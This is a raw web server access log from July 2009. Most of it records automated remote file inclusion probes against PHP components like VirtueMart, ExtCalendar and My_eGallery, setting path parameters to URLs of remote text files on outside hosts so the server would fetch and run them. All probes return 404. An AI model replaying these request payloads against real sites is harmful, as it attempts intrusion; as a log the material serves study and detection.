83.16.182.130 - - [01/Jul/2009:21:20:28 +0000] "GET /logs/modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 311
83.16.182.130 - - [01/Jul/2009:21:20:28 +0000] "GET /logs/access_log%20%20/modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 324
88.191.37.60 - - [01/Jul/2009:21:21:11 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://request.radiomillenium.ro/images/rhs/idade1.txt??? HTTP/1.1" 404 339
88.191.37.60 - - [01/Jul/2009:21:21:18 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://web-master.kiev.ua/admin/tinymce/jscripts/tiny_mce/utils/idade1.txt??? HTTP/1.1" 404 339
220.231.126.252 - - [01/Jul/2009:21:26:53 +0000] "GET /modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 306
220.231.126.252 - - [01/Jul/2009:21:26:53 +0000] "GET /logs/modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 311
220.231.126.252 - - [01/Jul/2009:21:26:53 +0000] "GET /logs/access_log%20%20/modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 324
83.16.182.130 - - [01/Jul/2009:21:27:13 +0000] "GET /logs/access_log/modules/My_eGallery/index.php?basepath=http://badmintonblog.net/blog/img/5.jpg?? HTTP/1.1" 404 322
87.118.116.72 - - [01/Jul/2009:21:34:47 +0000] "GET /logs///vwar/backup/errors.php?error=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 306
87.118.116.72 - - [01/Jul/2009:21:34:47 +0000] "GET ///vwar/backup/errors.php?error=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 301
87.118.116.72 - - [01/Jul/2009:21:34:47 +0000] "GET /logs/access_log///vwar/backup/errors.php?error=http://www.st-computer.biz/media/system/css/idev.txt??? HTTP/1.1" 404 317
195.225.104.106 - - [01/Jul/2009:22:05:37 +0000] "GET /logs/access_log//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 318
195.225.104.106 - - [01/Jul/2009:22:05:37 +0000] "GET /logs//skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 307
195.225.104.106 - - [01/Jul/2009:22:05:37 +0000] "GET //skin/zero_vote/error.php?dir=http://www.accesoplugin.com/imgs//info.txt??? HTTP/1.1" 404 302
72.14.199.85 - - [01/Jul/2009:22:08:40 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
72.82.228.83 - - [01/Jul/2009:22:28:37 +0000] "GET /logs/access_log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 331
72.82.228.83 - - [01/Jul/2009:22:28:37 +0000] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 320
72.82.228.83 - - [01/Jul/2009:22:28:38 +0000] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 315
72.82.228.83 - - [01/Jul/2009:22:32:12 +0000] "GET /logs/access_log%20%20/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://kq-china.com/web/templates/ja_purity/id1.txt??????? HTTP/1.1" 404 333
212.227.93.172 - - [01/Jul/2009:22:37:32 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 321
212.227.93.172 - - [01/Jul/2009:22:37:32 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 326
87.106.54.126 - - [01/Jul/2009:22:37:34 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 321
87.106.54.126 - - [01/Jul/2009:22:37:34 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 337
87.106.54.126 - - [01/Jul/2009:22:37:34 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 326
212.227.93.172 - - [01/Jul/2009:22:37:36 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 337
87.98.222.18 - - [01/Jul/2009:22:38:07 +0000] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 333
87.98.222.18 - - [01/Jul/2009:22:38:07 +0000] "GET /logs/access_log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 344
87.98.222.18 - - [01/Jul/2009:22:38:07 +0000] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 328
87.106.54.126 - - [01/Jul/2009:22:39:19 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 339
87.98.222.18 - - [01/Jul/2009:22:41:54 +0000] "GET /logs/access_log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 346
201.38.0.130 - - [01/Jul/2009:22:42:01 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 321
201.38.0.130 - - [01/Jul/2009:22:42:01 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 339
201.38.0.130 - - [01/Jul/2009:22:42:01 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 326
212.227.93.172 - - [01/Jul/2009:22:43:03 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 339
218.94.6.3 - - [01/Jul/2009:22:44:13 +0000] "GET //components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 321
218.94.6.3 - - [01/Jul/2009:22:44:18 +0000] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 326
218.94.6.3 - - [01/Jul/2009:22:44:18 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 337
218.94.6.3 - - [01/Jul/2009:22:46:04 +0000] "GET /logs/access_log%20%20//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 339
201.38.0.130 - - [01/Jul/2009:22:59:35 +0000] "GET /logs/access_log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT%5BLIB_DIR%5D=http://eng.nevskydvor.ru/php/AinuLid1.txt?? HTTP/1.1" 404 337
72.14.199.85 - - [01/Jul/2009:23:08:51 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
206.196.125.113 - - [01/Jul/2009:23:11:07 +0000] "GET /atom.xml HTTP/1.1" 200 4103
74.6.8.98 - - [01/Jul/2009:23:13:09 +0000] "GET /robots.txt HTTP/1.0" 404 275
74.6.8.98 - - [01/Jul/2009:23:13:09 +0000] "GET /mail/html/login.php HTTP/1.0" 200 1562
74.6.8.98 - - [01/Jul/2009:23:13:09 +0000] "GET /mail/themes/default.css HTTP/1.0" 200 3783
62.77.32.217 - - [01/Jul/2009:23:28:35 +0000] "GET /appserv/main.php?appserv_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 293
62.77.32.217 - - [01/Jul/2009:23:28:40 +0000] "GET /logs/appserv/main.php?appserv_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 298
66.11.230.36 - - [01/Jul/2009:23:34:13 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 329
66.11.230.36 - - [01/Jul/2009:23:34:13 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 334
66.11.230.36 - - [01/Jul/2009:23:34:14 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 345
66.11.230.36 - - [01/Jul/2009:23:35:08 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 347
124.0.145.1 - - [01/Jul/2009:23:38:12 +0000] "GET /logs///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 348
124.0.145.1 - - [01/Jul/2009:23:38:12 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 359
124.0.145.1 - - [01/Jul/2009:23:38:12 +0000] "GET ///administrator/components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://food114.tv/banner/shirohige/fxid.txt?? HTTP/1.1" 404 343
124.0.139.129 - - [01/Jul/2009:23:44:57 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [01/Jul/2009:23:44:57 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [01/Jul/2009:23:45:55 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
67.228.87.83 - - [01/Jul/2009:23:46:58 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
124.0.139.129 - - [01/Jul/2009:23:47:03 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [01/Jul/2009:23:47:03 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [01/Jul/2009:23:47:03 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [01/Jul/2009:23:49:38 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [01/Jul/2009:23:50:44 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [01/Jul/2009:23:57:38 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 345
122.153.28.140 - - [01/Jul/2009:23:57:38 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 334
122.153.28.140 - - [01/Jul/2009:23:57:38 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:00:01:23 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://gana.net/kboard_v2/kboard/id1.txt? HTTP/1.1" 404 347
218.232.105.116 - - [02/Jul/2009:00:02:08 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:00:02:11 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:00:02:11 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:00:02:11 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
218.232.105.116 - - [02/Jul/2009:00:02:12 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:00:02:13 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
62.77.32.217 - - [02/Jul/2009:00:03:34 +0000] "GET /appserv/main.php?appserv_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 293
62.77.32.217 - - [02/Jul/2009:00:03:34 +0000] "GET /logs/access_log/appserv/main.php?appserv_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 309
62.77.32.217 - - [02/Jul/2009:00:03:34 +0000] "GET /logs/appserv/main.php?appserv_root=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 298
218.232.105.116 - - [02/Jul/2009:00:05:14 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
218.232.105.116 - - [02/Jul/2009:00:05:19 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
62.77.32.217 - - [02/Jul/2009:00:05:53 +0000] "GET /logs/appserv/main.php?appserv_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 298
62.77.32.217 - - [02/Jul/2009:00:05:53 +0000] "GET /appserv/main.php?appserv_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 293
62.77.32.217 - - [02/Jul/2009:00:05:54 +0000] "GET /logs/access_log%20%20/appserv/main.php?appserv_root=http://anthony-campbell.com/public/_a?? HTTP/1.1" 404 311
74.6.8.98 - - [02/Jul/2009:00:07:02 +0000] "GET / HTTP/1.0" 200 125
72.14.199.85 - - [02/Jul/2009:00:08:56 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
69.72.208.90 - - [02/Jul/2009:00:14:40 +0000] "GET ///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 322
69.72.208.90 - - [02/Jul/2009:00:14:40 +0000] "GET /logs///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 327
69.72.208.90 - - [02/Jul/2009:00:14:40 +0000] "GET /logs/access_log///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 338
69.72.208.90 - - [02/Jul/2009:00:19:00 +0000] "GET /logs/access_log%20%20///components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://getcpn.com/104/copyright.txt???? HTTP/1.1" 404 340
209.151.224.247 - - [02/Jul/2009:00:19:48 +0000] "GET /http://www.museum-mputantular.com/upload/idx? HTTP/1.1" 404 321
209.151.224.247 - - [02/Jul/2009:00:25:31 +0000] "GET /logs/access_log/http://www.museum-mputantular.com/upload/idx? HTTP/1.1" 404 337
209.151.224.247 - - [02/Jul/2009:00:25:31 +0000] "GET /http://www.museum-mputantular.com/upload/idx? HTTP/1.1" 404 321
209.151.224.247 - - [02/Jul/2009:00:25:31 +0000] "GET /logs/http://www.museum-mputantular.com/upload/idx? HTTP/1.1" 404 326
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 355
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /logs/access_log/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 355
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 344
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /logs/administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 344
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 339
195.34.78.110 - - [02/Jul/2009:00:34:11 +0000] "GET /administrator/components/com_chronocontact/excelwriter/OLE.php?mosConfig_absolute_path=http://blendcolours.com/scc/1.swf?? HTTP/1.1" 404 339
124.0.139.129 - - [02/Jul/2009:00:39:06 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:00:39:10 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
124.0.139.129 - - [02/Jul/2009:00:39:10 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [02/Jul/2009:00:40:49 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
124.0.139.129 - - [02/Jul/2009:00:40:49 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
124.0.139.129 - - [02/Jul/2009:00:40:49 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:00:44:41 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:00:44:41 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:00:44:41 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
122.153.28.140 - - [02/Jul/2009:00:45:12 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:00:45:12 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:00:45:12 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
122.153.28.140 - - [02/Jul/2009:00:45:20 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:00:45:20 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:00:45:20 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:00:45:28 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:00:45:28 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:00:45:28 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:00:53:02 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
218.232.105.116 - - [02/Jul/2009:00:54:25 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:00:54:37 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
124.0.139.129 - - [02/Jul/2009:00:54:51 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
218.232.105.116 - - [02/Jul/2009:00:55:37 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:00:56:25 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
72.14.199.85 - - [02/Jul/2009:01:08:58 +0000] "GET /feeds/posts/default HTTP/1.1" 404 296
218.232.105.116 - - [02/Jul/2009:01:17:46 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:01:17:46 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
218.232.105.116 - - [02/Jul/2009:01:17:46 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
218.232.105.116 - - [02/Jul/2009:01:17:47 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
218.232.105.116 - - [02/Jul/2009:01:17:47 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
218.232.105.116 - - [02/Jul/2009:01:17:47 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
211.255.23.47 - - [02/Jul/2009:01:22:17 +0000] "GET //skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 309
211.255.23.47 - - [02/Jul/2009:01:22:17 +0000] "GET /logs//skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 314
211.255.23.47 - - [02/Jul/2009:01:22:17 +0000] "GET /logs/access_log//skin/ggambo7002_board/write.php?dir=http://www.castandcatch.com/forum/phpBB3/idd.txt?? HTTP/1.1" 404 325
218.232.105.116 - - [02/Jul/2009:01:22:20 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
218.232.105.116 - - [02/Jul/2009:01:23:04 +0000] "GET /logs/access_log%20%20///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 347
122.153.28.140 - - [02/Jul/2009:01:28:07 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:01:28:07 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
122.153.28.140 - - [02/Jul/2009:01:28:07 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
122.153.28.140 - - [02/Jul/2009:01:28:12 +0000] "GET ///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 329
122.153.28.140 - - [02/Jul/2009:01:28:12 +0000] "GET /logs/access_log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 345
122.153.28.140 - - [02/Jul/2009:01:28:12 +0000] "GET /logs///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.teresuelvo.com///administrator/components/com_virtuemart/id1.txt? HTTP/1.1" 404 334
208.71.89.180 - - [02/Jul/2009:01:30:28 +0000] "GET /errors.php?error=http://www.stmaryofthecataract.com/images/save.jpg? HTTP/1.1" 404 287
83.98.209.71 - - [02/Jul/2009:01:40:05 +0000] "GET /logs/access_log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 304
83.98.209.71 - - [02/Jul/2009:01:40:05 +0000] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://anthony-campbell.com/public/cfg?? HTTP/1.1" 404 293
